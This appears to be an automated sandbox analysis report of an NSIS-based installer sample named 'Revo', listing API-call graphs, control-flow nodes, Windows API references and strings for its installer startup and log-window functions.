API calls 3747 40189e 3744->3747 3745 4066a2 lstrcpynW 3745->3752 3749 4018e3 SetFileTime 3751 4018f5 CloseHandle 3749->3751 3750 4066df 21 API calls 3750->3752 3751->3747 3753 401906 3751->3753 3752->3737 3752->3738 3752->3740 3752->3741 3752->3745 3752->3750 3758 405d02 MessageBoxIndirectW 3752->3758 3762 401889 3752->3762 3763 406192 GetFileAttributesW CreateFileW 3752->3763 3754 40190b 3753->3754 3755 40191e 3753->3755 3756 4066df 21 API calls 3754->3756 3757 4066df 21 API calls 3755->3757 3759 401913 lstrcatW 3756->3759 3760 401926 3757->3760 3758->3752 3759->3760 3761 405d02 MessageBoxIndirectW 3760->3761 3761->3747 3762->3744 3762->3747 3763->3752 3765 4033c1 3764->3765 3766 4033a5 SetFilePointer 3764->3766 3781 40349e GetTickCount 3765->3781 3766->3765 3769 4018cf 3769->3749 3769->3751 3770 406215 ReadFile 3771 4033e1 3770->3771 3771->3769 3772 40349e 46 API calls 3771->3772 3773 4033f8 3772->3773 3773->3769 3774 403464 ReadFile 3773->3774 3776 403407 3773->3776 3774->3769 3776->3769 3777 406215 ReadFile 3776->3777 3778 406244 WriteFile 3776->3778 3777->3776 3778->3776 3779->3732 3780->3733 3782 4035f6 3781->3782 3783 4034cc 3781->3783 3784 403053 36 API calls 3782->3784 3794 40361d SetFilePointer 3783->3794 3791 4033c8 3784->3791 3786 4034d7 SetFilePointer 3788 4034fc 3786->3788 3788->3791 3792 406244 WriteFile 3788->3792 3793 4035d7 SetFilePointer 3788->3793 3795 403607 3788->3795 3798 403053 3788->3798 3812 406c11 3788->3812 3791->3769 3791->3770 3792->3788 3793->3782 3794->3786 3796 406215 ReadFile 3795->3796 3797 40361a 3796->3797 3797->3788 3799 403064 3798->3799 3800 40307c 3798->3800 3801 40306d DestroyWindow 3799->3801 3811 403074 3799->3811 3802 403084 3800->3802 3803 40308c GetTickCount 3800->3803 3801->3811 3804 406ad2 2 API calls 3802->3804 3805 40309a 3803->3805 3803->3811 3804->3811 3806 4030a2 3805->3806 3807 4030cf CreateDialogParamW ShowWindow 3805->3807 3806->3811 3819 403037 3806->3819 3807->3811 3809 4030b0 wsprintfW 3810 405727 28 API calls 3809->3810 3810->3811 3811->3788 3813 406c36 3812->3813 3814 406c3e 3812->3814 3813->3788 3814->3813 3815 406cc5 GlobalFree 3814->3815 3816 406cce GlobalAlloc 3814->3816 3817 406d45 GlobalAlloc 3814->3817 3818 406d3c GlobalFree 3814->3818 3815->3816 3816->3813 3816->3814 3817->3813 3817->3814 3818->3817 3820 403046 3819->3820 3821 403048 MulDiv 3819->3821 3820->3821 3821->3809 4778 401a97 4779 402da9 21 API calls 4778->4779 4780 401aa0 4779->4780 4781 402da9 21 API calls 4780->4781 4782 401a45 4781->4782 4783 401598 4784 4015b1 4783->4784 4785 4015a8 ShowWindow 4783->4785 4786 4015bf ShowWindow 4784->4786 4787 402c4f 4784->4787 4785->4784 4786->4787 4788 402419 4789 402dcb 21 API calls 4788->4789 4790 402428 4789->4790 4791 402dcb 21 API calls 4790->4791 4792 402431 4791->4792 4793 402dcb 21 API calls 4792->4793 4794 40243b GetPrivateProfileStringW 4793->4794 4795 40201b 4796 402dcb 21 API calls 4795->4796 4797 402022 4796->4797 4798 4069ff 2 API calls 4797->4798 4799 402028 4798->4799 4801 402039 4799->4801 4802 4065e9 wsprintfW 4799->4802 4802->4801 4803 40569b 4804 4056ab 4803->4804 4805 4056bf 4803->4805 4806 4056b1 4804->4806 4807 405708 4804->4807 4808 4056c7 IsWindowVisible 4805->4808 4814 4056de 4805->4814 4810 40466d SendMessageW 4806->4810 4809 40570d CallWindowProcW 4807->4809 4808->4807 4811 4056d4 4808->4811 4812 4056bb 4809->4812 4810->4812 4813 404fdc 5 API calls 4811->4813 4813->4814 4814->4809 4815 40505c 4 API calls 4814->4815 4815->4807 4816 401b9c 4817 402dcb 21 API calls 4816->4817 4818 401ba3 4817->4818 4819 402da9 21 API calls 4818->4819 4820 401bac wsprintfW 4819->4820 4821 402c4f 4820->4821 4822 40149e 4823 4023c2 4822->4823 4824 4014ac PostQuitMessage 4822->4824 4824->4823 3827 4016a0 3828 402dcb 21 API calls 3827->3828 3829 4016a7 3828->3829 3830 402dcb 21 API calls 3829->3830 3831 4016b0 3830->3831 3832 402dcb 21 API calls 3831->3832 3833 4016b9 MoveFileW 3832->3833 3834 4016cc 3833->3834 3835 4016c5 3833->3835 3836 4069ff 2 API calls 3834->3836 3839 40231b 3834->3839 3837 401423 28 API calls 3835->3837 3838 4016db 3836->3838 3837->3839 3838->3839 3840 406462 40 API calls 3838->3840 3840->3835 3841 404122 3842 40413a 3841->3842 3843 40429b 3841->3843 3842->3843 3844 404146 3842->3844 3845 4042ec 3843->3845 3846 4042ac GetDlgItem GetDlgItem 3843->3846 3848 404151 SetWindowPos 3844->3848 3849 404164 3844->3849 3847 404346 3845->3847 3858 401389 2 API calls 3845->3858 3850 404621 22 API calls 3846->3850 3904 404296 3847->3904 3912 40466d 3847->3912 3848->3849 3853 40416d ShowWindow 3849->3853 3854 4041af 3849->3854 3851 4042d6 SetClassLongW 3850->3851 3855 40140b 2 API calls 3851->3855 3859 40418d GetWindowLongW 3853->3859 3878 404259 3853->3878 3856 4041b7 DestroyWindow 3854->3856 3857 4041ce 3854->3857 3855->3845 3869 4045aa 3856->3869 3860 4041d3 SetWindowLongW 3857->3860 3861 4041e4 3857->3861 3862 40431e 3858->3862 3864 4041a6 ShowWindow 3859->3864 3859->3878 3860->3904 3866 4041f0 GetDlgItem 3861->3866 3861->3878 3862->3847 3867 404322 SendMessageW 3862->3867 3863 404688 8 API calls 3863->3904 3864->3854 3865 4045ac DestroyWindow EndDialog 3865->3869 3871 404201 SendMessageW IsWindowEnabled 3866->3871 3872 40421e 3866->3872 3867->3904 3868 40140b 2 API calls 3902 404358 3868->3902 3870 4045db ShowWindow 3869->3870 3869->3904 3870->3904 3871->3872 3871->3904 3874 40422b 3872->3874 3876 404272 SendMessageW 3872->3876 3877 40423e 3872->3877 3884 404223 3872->3884 3873 4066df 21 API calls 3873->3902 3874->3876 3874->3884 3876->3878 3879 404246 3877->3879 3880 40425b 3877->3880 3878->3863 3883 40140b 2 API calls 3879->3883 3882 40140b 2 API calls 3880->3882 3881 404621 22 API calls 3881->3902 3882->3884 3883->3884 3884->3878 3921 4045fa 3884->3921 3885 404621 22 API calls 3886 4043d3 GetDlgItem 3885->3886 3887 4043f0 ShowWindow KiUserCallbackDispatcher 3886->3887 3888 4043e8 3886->3888 3915 404643 KiUserCallbackDispatcher 3887->3915 3888->3887 3890 40441a KiUserCallbackDispatcher 3895 40442e 3890->3895 3891 404433 GetSystemMenu EnableMenuItem SendMessageW 3892 404463 SendMessageW 3891->3892 3891->3895 3892->3895 3895->3891 3916 404656 SendMessageW 3895->3916 3917 404103 3895->3917 3920 4066a2 lstrcpynW 3895->3920 3897 404492 lstrlenW 3898 4066df 21 API calls 3897->3898 3899 4044a8 SetWindowTextW 3898->3899 3900 401389 2 API calls 3899->3900 3900->3902 3901 4044ec DestroyWindow 3901->3869 3903 404506 CreateDialogParamW 3901->3903 3902->3865 3902->3868 3902->3873 3902->3881 3902->3885 3902->3901 3902->3904 3903->3869 3905 404539 3903->3905 3906 404621 22 API calls 3905->3906 3907 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3906->3907 3908 401389 2 API calls 3907->3908 3909 40458a 3908->3909 3909->3904 3910 404592 ShowWindow 3909->3910 3911 40466d SendMessageW 3910->3911 3911->3869 3913 404685 3912->3913 3914 404676 SendMessageW 3912->3914 3913->3902 3914->3913 3915->3890 3916->3895 3918 4066df 21 API calls 3917->3918 3919 404111 SetWindowTextW 3918->3919 3919->3895 3920->3897 3922 404601 3921->3922 3923 404607 SendMessageW 3921->3923 3922->3923 3923->3878 3924 402324 3925 402dcb 21 API calls 3924->3925 3926 40232a 3925->3926 3927 402dcb 21 API calls 3926->3927 3928 402333 3927->3928 3929 402dcb 21 API calls 3928->3929 3930 40233c 3929->3930 3931 4069ff 2 API calls 3930->3931 3932 402345 3931->3932 3933 402356 lstrlenW lstrlenW 3932->3933 3937 402349 3932->3937 3935 405727 28 API calls 3933->3935 3934 405727 28 API calls 3938 402351 3934->3938 3936 402394 SHFileOperationW 3935->3936 3936->3937 3936->3938 3937->3934 3937->3938 4825 401a24 4826 402dcb 21 API calls 4825->4826 4827 401a2b 4826->4827 4828 402dcb 21 API calls 4827->4828 4829 401a34 4828->4829 4830 401a3b lstrcmpiW 4829->4830 4831 401a4d lstrcmpW 4829->4831 4832 401a41 4830->4832 4831->4832 4237 401da6 4238 401db9 GetDlgItem 4237->4238 4239 401dac 4237->4239 4241 401db3 4238->4241 4240 402da9 21 API calls 4239->4240 4240->4241 4242 401dfa GetClientRect LoadImageW SendMessageW 4241->4242 4243 402dcb 21 API calls 4241->4243 4245 401e58 4242->4245 4247 401e64 4242->4247 4243->4242 4246 401e5d DeleteObject 4245->4246 4245->4247 4246->4247 4840 4023a8 4841 4023af 4840->4841 4844 4023c2 4840->4844 4842 4066df 21 API calls 4841->4842 4843 4023bc 4842->4843 4845 405d02 MessageBoxIndirectW 4843->4845 4845->4844 4846 402c2a SendMessageW 4847 402c44 InvalidateRect 4846->4847 4848 402c4f 4846->4848 4847->4848 4270 4024af 4271 402dcb 21 API calls 4270->4271 4272 4024c1 4271->4272 4273 402dcb 21 API calls 4272->4273 4274 4024cb 4273->4274 4287 402e5b 4274->4287 4277 402953 4278 402503 4280 40250f 4278->4280 4282 402da9 21 API calls 4278->4282 4279 402dcb 21 API calls 4281 4024f9 lstrlenW 4279->4281 4283 40252e RegSetValueExW 4280->4283 4284 403396 48 API calls 4280->4284 4281->4278 4282->4280 4285 402544 RegCloseKey 4283->4285 4284->4283 4285->4277 4288 402e76 4287->4288 4291 40653d 4288->4291 4292 40654c 4291->4292 4293 4024db 4292->4293 4294 406557 RegCreateKeyExW 4292->4294 4293->4277 4293->4278 4293->4279 4294->4293 4295 402930 4296 402dcb 21 API calls 4295->4296 4297 402937 FindFirstFileW 4296->4297 4298 40295f 4297->4298 4302 40294a 4297->4302 4299 402968 4298->4299 4303 4065e9 wsprintfW 4298->4303 4304 4066a2 lstrcpynW 4299->4304 4303->4299 4304->4302 4849 401931 4850 401968 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 40196d 4851->4852 4853 405dae 71 API calls 4852->4853 4854 401976 4853->4854 4855 403d32 4856 403d3d 4855->4856 4857 403d41 4856->4857 4858 403d44 GlobalAlloc 4856->4858 4858->4857 4866 401934 4867 402dcb 21 API calls 4866->4867 4868 40193b 4867->4868 4869 405d02 MessageBoxIndirectW 4868->4869 4870 401944 4869->4870 4335 4028b6 4336 4028bd 4335->4336 4338 402bce 4335->4338 4337 402da9 21 API calls 4336->4337 4339 4028c4 4337->4339 4340 4028d3 SetFilePointer 4339->4340 4340->4338 4341 4028e3 4340->4341 4343 4065e9 wsprintfW 4341->4343 4343->4338 4871 401f37 4872 402dcb 21 API calls 4871->4872 4873 401f3d 4872->4873 4874 402dcb 21 API calls 4873->4874 4875 401f46 4874->4875 4876 402dcb 21 API calls 4875->4876 4877 401f4f 4876->4877 4878 402dcb 21 API calls 4877->4878 4879 401f58 4878->4879 4880 401423 28 API calls 4879->4880 4881 401f5f 4880->4881 4888 405cc8 ShellExecuteExW 4881->4888 4883 401fa7 4884 406b41 5 API calls 4883->4884 4885 402953 4883->4885 4886 401fc4 CloseHandle 4884->4886 4886->4885 4888->4883 4344 402fb8 4345 402fe3 4344->4345 4346 402fca SetTimer 4344->4346 4347 403031 4345->4347 4348 403037 MulDiv 4345->4348 4346->4345 4349 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 4348->4349 4349->4347 4889 4014b8 4890 4014be 4889->4890 4891 401389 2 API calls 4890->4891 4892 4014c6 4891->4892 4893 401d3c 4894 402da9 21 API calls 4893->4894 4895 401d42 IsWindow 4894->4895 4896 401a45 4895->4896

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 25 403794 21->25 25->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 38 403839-40383e 35->38 39 40383f-403843 35->39 36->35 36->36 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->44 45 4039a9-4039c3 DeleteFileW call 4030f5 37->45 38->39 42 403904-403913 call 405f9e 39->42 43 403849-40384f 39->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 ExitProcess CoUninitialize 45->66 67 4039c9-4039cf 45->67 52 40385a-40385d 47->52 53 40385f 47->53 54 4038a4-4038a9 48->54 55 4038bf-4038f9 48->55 52->48 52->53 53->48 54->55 56 4038ab-4038b3 54->56 58 403901-403903 55->58 59 4038fb-4038ff 55->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->55 62->63 63->55 64->45 64->66 65->37 69 403bc2-403bd2 call 405d02 ExitProcess 66->69 70 403be6-403bec 66->70 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 77 403c6a-403c72 70->77 78 403bee-403c04 GetCurrentProcess OpenProcessToken 70->78 88 4039e2-403a17 71->88 89 403a2e-403a38 71->89 86 403a74-403a78 72->86 80 403c74 77->80 81 403c78-403c7c ExitProcess 77->81 84 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403c3a-403c48 call 406a96 78->85 80->81 84->85 97 403c56-403c61 ExitWindowsEx 85->97 98 403c4a-403c54 85->98 86->66 93 403a19-403a1d 88->93 91 403a3a-403a48 call 406079 89->91 92 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 89->92 91->66 107 403a4e-403a64 call 4066a2 * 2 91->107 110 403ab4-403acc 92->110 111 403aa5-403aaf call 4066a2 92->111 95 403a26-403a2a 93->95 96 403a1f-403a24 93->96 95->93 101 403a2c 95->101 96->95 96->101 97->77 102 403c63-403c65 call 40140b 97->102 98->97 98->102 101->89 102->77 107->72 114 403ad1-403ad5 110->114 111->110 116 403ada-403b04 wsprintfW call 4066df 114->116 120 403b06-403b0b call 405bf6 116->120 121 403b0d call 405c50 116->121 124 403b12-403b14 120->124 121->124 126 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 124->126 127 403b16-403b20 GetFileAttributesW 124->127 135 403b71-403b92 call 406462 call 4066df call 405c85 126->135 136 403bae 126->136 128 403b41-403b4c 127->128 129 403b22-403b2b DeleteFileW 127->129 128->114 132 403b4e 128->132 129->128 131 403b2d-403b3f call 405dae 129->131 131->116 131->128 132->66 144 403b94-403b9e 135->144 145 403bd8-403be4 CloseHandle 135->145 136->66 144->136 146 403ba0-403ba8 call 4069ff 144->146 145->136 146->116 146->136
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32 ref: 00403688
                                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                                                                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004037A3
                                                                                                                                                                            • SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
                                                                                                                                                                            • GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                                                                                                                                            • CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                                                                                                                                            • GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                                                            • lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                                                                                                                                            • GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                                                                                                                                            • lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                                                                                                                                            • DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                                                                                                                                            • lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                            • wsprintfW.USER32 ref: 00403AE4
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
                                                                                                                                                                            • DeleteFileW.KERNEL32(00481000), ref: 00403B23
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
                                                                                                                                                                              • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                                                                                                                                            • CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
                                                                                                                                                                              • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                              • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                              • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
                                                                                                                                                                              • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403BD2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403C7C
                                                                                                                                                                              • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                            • API String ID: 2017177436-2502969717
                                                                                                                                                                            • Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                                                            • Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 149 405866-405881 150 405a10-405a17 149->150 151 405887-40594e GetDlgItem * 3 call 404656 call 404faf GetClientRect GetSystemMetrics SendMessageW * 2 149->151 153 405a41-405a4e 150->153 154 405a19-405a3b GetDlgItem CreateThread CloseHandle 150->154 173 405950-40596a SendMessageW * 2 151->173 174 40596c-40596f 151->174 156 405a50-405a56 153->156 157 405a6c-405a76 153->157 154->153 161 405a91-405a9a call 404688 156->161 162 405a58-405a67 ShowWindow * 2 call 404656 156->162 158 405a78-405a7e 157->158 159 405acc-405ad0 157->159 163 405a80-405a8c call 4045fa 158->163 164 405aa6-405ab6 ShowWindow 158->164 159->161 167 405ad2-405ad8 159->167 170 405a9f-405aa3 161->170 162->157 163->161 171 405ac6-405ac7 call 4045fa 164->171 172 405ab8-405ac1 call 405727 164->172 167->161 175 405ada-405aed SendMessageW 167->175 171->159 172->171 173->174 178 405971-40597d SendMessageW 174->178 179 40597f-405996 call 404621 174->179 180 405af3-405b1e CreatePopupMenu call 4066df AppendMenuW 175->180 181 405bef-405bf1 175->181 178->179 188 405998-4059ac ShowWindow 179->188 189 4059cc-4059ed GetDlgItem SendMessageW 179->189 186 405b20-405b30 GetWindowRect 180->186 187 405b33-405b48 TrackPopupMenu 180->187 181->170 186->187 187->181 190 405b4e-405b65 187->190 191 4059bb 188->191 192 4059ae-4059b9 ShowWindow 188->192 189->181 193 4059f3-405a0b SendMessageW * 2 189->193 194 405b6a-405b85 SendMessageW 190->194 195 4059c1-4059c7 call 404656 191->195 192->195 193->181 194->194 196 405b87-405baa OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 195->189 198 405bac-405bd3 SendMessageW 196->198 198->198 199 405bd5-405be9 GlobalUnlock SetClipboardData CloseClipboard 198->199 199->181
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405910
                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                                              • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
